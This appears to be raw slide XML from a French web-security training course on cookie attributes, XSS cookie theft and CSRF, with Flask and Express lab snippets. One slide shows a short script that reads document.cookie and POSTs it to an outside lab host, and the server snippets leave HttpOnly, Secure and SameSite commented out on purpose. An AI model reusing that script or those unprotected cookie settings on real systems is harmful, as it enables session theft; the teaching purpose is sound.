          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="2048256"/>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HTTPS uniquement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2468880"/>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SameSite=Lax / Strict</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="2468880"/>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limite l’envoi cross-site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2889504"/>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Path / Domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="2889504"/>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réduit la surface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="3310128"/>
            <a:ext cx="2969971" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Max-Age / Expires</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="3310128"/>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pas de session éternelle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3785615"/>
            <a:ext cx="5120640" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>localStorage est un simple tiroir JS, limité au domaine. Pas de HttpOnly, aucun Secure.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rounded Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="4526280" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4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720840" y="1188720"/>
            <a:ext cx="4251960" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="93C5FD"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application  ·  Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720840" y="1554480"/>
            <a:ext cx="4160520" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="93C5FD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Name    HttpOnly    Secure    SameSite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720840" y="1901952"/>
            <a:ext cx="4160520" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>session  ✗    false    false    None</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720840" y="2249424"/>
            <a:ext cx="4160520" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>session  ✓    true    true    Lax</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02 · portée</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Path et Domain, la serrure oubliée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>
            <a:ext cx="10058400" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Le cousin  ·  training2.dercetech.com/day-1/s2  —  il liste ce que JS voit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1261872"/>
            <a:ext cx="10058400" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Même idée chez Render  ·  blackthorn-winter-matchmaking-server.onrender.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1463039"/>
            <a:ext cx="10058400" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Qui envoie le cookie ? Le navigateur, tout seul. Qui choisit la règle ? Le serveur, sur Set-Cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1847088"/>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005840" y="1847088"/>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Sans Domain  ·  host-only  ·  le défaut, le bon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>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serveur n’a pas dit Domain. Le navigateur n’envoie le cookie qu’à CET hôte. training2 ne le voit pas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rounded Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2743200"/>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005840" y="2743200"/>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325880" y="2779776"/>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Domain=.dercetech.com  ·  vous l’avez demandé</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2999232"/>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Vous avez dit au navigateur : envoie-le à tous les *.dercetech.com. training2 le reçoit. Le cousin n’a rien volé. C’est vous.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rounded Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3639312"/>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3639312"/>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3675887"/>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Domain=onrender.com  ·  le navigateur dit non</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="389534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Public Suffix List : liste que le navigateur embarque (Mozilla, publicsuffix.org). Pas le serveur. .com, .onrender.com, .github.io ne sont à personne. Domain=onrender.com → refusé. dercetech.com n’est pas dessus : trop large, et ça fuit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4553712"/>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Set-Cookie trop large : le serveur. PSL : le navigateur (pas une config serveur). Le cousin encaisse ce que la PSL n’a pas bloqué.</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B  ·  XSS</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XSS : bad-sector.games sait qui vous êtes</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https://training.bad-sector.games/secu-5d/day1/s2/</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https://training.bad-sector.games/secu-5d/day1/s2/</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Un script que vous n’avez pas écrit s’exécute sur la page unsafe.</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Il lit document.cookie et l’envoie ailleurs. C’est tout.</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Ouvrez le receiver. Votre session s’affiche là-bas.</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Constater le vol, sans rien coller. Puis relire HttpOnly.</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Rester connecté sur le login unsafe (lab A).</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Ouvrir le lien ci-dessus : le receiver liste la session.</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Network, sur la page unsafe : library.js POST vers bad-sector.games.</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B · le vol</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Ce que library.js envoie, sans magie</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training.bad-sector.games/…/library.js</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const visibleCookies = document.cookie;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fetch("https://training.bad-sector.games/secu-5d/day1/s2/api.php", {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  method: "POST",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  body: new URLSearchParams({ cookie: visibleCookies }),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>});</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HttpOnly : document.cookie ne voit plus session. Le POST part vide.</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C · debugger</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C’est l’heure de brancher le debugger</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Ouvrez day-1/s2_02_cookies (python-flask ou node-express) dans VS Code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Breakpoint sur POST /api/login. Relancez. Connectez-vous. Token, cookie, user : sous les yeux.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d1s2-debugger.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1591056"/>
            <a:ext cx="10149840" cy="3155471"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4801391"/>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Décommentez un flag, redémarrez, supprimez l’ancien cookie, reconnectez. Comparez dans DevTools.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C  ·  40 min</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Inspecter, voler, durcir — Flask et Express</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day-1/s2_02_cookies</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Code local  ·  day-1/s2_02_cookies  ·  python-flask  +  node-express</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Les flags sont commentés. Une option à la fois, comme le panneau de droite.</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Flask et Express : même routes, mêmes comptes, même cookie.</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HttpOnly : document.cookie se tait. C’est le test.</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Lire le cookie nu. Voler la session. Décommenter les flags. Vérifier dans DevTools.</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Breakpoint sur /api/login. Se connecter. Lire session dans Application et document.cookie.</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Décommenter httpOnly. Supprimer l’ancien cookie, reconnecter : JS ne lit plus.</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Même chose pour Secure, SameSite, Path, Domain, Max-Age. Un seul à la fois.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C · snippet 1/2</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Le cookie nu — une option à la fois</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10058400" cy="1874519"/>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874519"/>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  ·  Flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1426464"/>
            <a:ext cx="9729216" cy="1490471"/>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response.set_cookie(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    "session", token,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    # httponly=True,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    # secure=True,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    # samesite="Lax",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    # path="/",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    # domain="127.0.0.1",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    # max_age=60 * 60,</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return jsonify(ok=True, user=user)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3081527"/>
            <a:ext cx="10058400" cy="199339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3081527"/>
            <a:ext cx="64008" cy="199339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3154679"/>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  ·  Express</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="3392423"/>
            <a:ext cx="9729216" cy="160934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response.cookie("session", token, {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  // httpOnly: true,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  // secure: true,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  // sameSite: "lax",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  // path: "/",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  // domain: "127.0.0.1",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  // maxAge: 60 * 60 * 1000,</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response.json({ ok: true, user });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="10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Décommentez un flag, redémarrez, virez l’ancien cookie, reconnectez. Flask et Express, même exercice.</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02 · SameSite</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SameSite : le cookie ne suit pas n’importe quel site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>
            <a:ext cx="10058400" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un autre site poste un formulaire vers le vôtre. Sans SameSite, le navigateur joint le cookie. Le serveur croit que c’est vous.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1444751"/>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444751"/>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25880" y="148132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Lax  ·  le défaut moderne</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="170078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Envoyé sur un GET top-level (un vrai clic). Pas sur un POST cross-site, pas sur un fetch depuis ailleurs. Couvre le CSRF des formulaires.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2340863"/>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05840" y="2340863"/>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325880" y="2377439"/>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Strict</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
